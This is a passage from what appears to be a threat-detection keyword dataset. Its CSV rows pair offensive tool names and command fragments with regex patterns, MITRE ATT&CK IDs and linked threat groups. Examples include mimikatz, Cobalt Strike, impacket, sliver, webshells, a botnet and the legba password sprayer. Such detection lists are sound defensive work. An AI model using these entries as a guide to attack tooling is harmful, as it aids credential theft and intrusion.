- Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50888"
"*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50889"
"*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50890"
"*LdapRelayScan.py*",".{0,1000}LdapRelayScan\.py.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","50891"
"*LdapRelayScan-main*",".{0,1000}LdapRelayScan\-main.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","50892"
"*ldapsearchad.py*",".{0,1000}ldapsearchad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","50895"
"*ldapsearch-ad.py*",".{0,1000}ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","50896"
"*ldap-searcher *",".{0,1000}ldap\-searcher\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","50897"
"*ldapsentinel * raw *",".{0,1000}ldapsentinel\s.{0,1000}\sraw\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50898"
"*ldapsentinel forest user*",".{0,1000}ldapsentinel\sforest\suser.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50899"
"*LdapSignCheck.exe*",".{0,1000}LdapSignCheck\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50900"
"*LdapSignCheck.Natives*",".{0,1000}LdapSignCheck\.Natives.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50901"
"*LdapSignCheck.sln*",".{0,1000}LdapSignCheck\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50902"
"*ldapsigncheck.x64.*",".{0,1000}ldapsigncheck\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50903"
"*ldapsigncheck.x86.*",".{0,1000}ldapsigncheck\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","50904"
"*LDAPWordlistHarvester.ps1*",".{0,1000}LDAPWordlistHarvester\.ps1.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","50905"
"*LDAPWordlistHarvester.py*",".{0,1000}LDAPWordlistHarvester\.py.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","50906"
"*LDAPWordlistHarvester-main*",".{0,1000}LDAPWordlistHarvester\-main.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","50907"
"*ldd2bloodhound*",".{0,1000}ldd2bloodhound.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","50908"
"*ldeep cache *",".{0,1000}ldeep\scache\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50909"
"*ldeep ldap -u *",".{0,1000}ldeep\sldap\s\-u\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50910"
"*ldeep*activedirectory.py*",".{0,1000}ldeep.{0,1000}activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50911"
"*ldeep*ldap_activedirectory.py*",".{0,1000}ldeep.{0,1000}ldap_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50912"
"*ldeep_dump_users_enabled.json",".{0,1000}ldeep_dump_users_enabled\.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50913"
"*ldeep_dump_users_enabled.lst",".{0,1000}ldeep_dump_users_enabled\.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","50914"
"*ldeep_enum*",".{0,1000}ldeep_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50915"
"*ldif2john.pl*",".{0,1000}ldif2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50916"
"*LDPreloadPrivesc*",".{0,1000}LDPreloadPrivesc.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","50918"
"*LdrLockLiberator-main*",".{0,1000}LdrLockLiberator\-main.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","50919"
"*leaky/leakbuf.go*",".{0,1000}leaky\/leakbuf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","50920"
"*Lecture KIWI_MSV1_0_*",".{0,1000}Lecture\sKIWI_MSV1_0_.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50921"
"*Led-Zeppelin\'s LFI File dumper*",".{0,1000}Led\-Zeppelin\\\'s\sLFI\sFile\sdumper.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","50922"
"*leechristensen/UnmanagedPowerShell*",".{0,1000}leechristensen\/UnmanagedPowerShell.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","50923"
"*Leeon123/Aoyama*",".{0,1000}Leeon123\/Aoyama.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","1","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","50924"
"*Leeon123/Python3-botnet*",".{0,1000}Leeon123\/Python3\-botnet.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","1","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","50925"
"*leftp/BackupCreds*",".{0,1000}leftp\/BackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","50926"
"*legalhackers.com/exploits/CVE*",".{0,1000}legalhackers\.com\/exploits\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","50927"
"*legalrestore@airmail.cc*",".{0,1000}legalrestore\@airmail\.cc.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50928"
"*legba * --username*",".{0,1000}legba\s.{0,1000}\s\-\-username.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50929"
"*legba amqp *--target *",".{0,1000}legba\samqp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50930"
"*legba dns *--data *",".{0,1000}legba\sdns\s.{0,1000}\-\-data\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50931"
"*legba ftp *--target *",".{0,1000}legba\sftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50932"
"*legba http *--http-payload *",".{0,1000}legba\shttp\s.{0,1000}\-\-http\-payload\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50933"
"*legba http.basic *--target *",".{0,1000}legba\shttp\.basic\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50934"
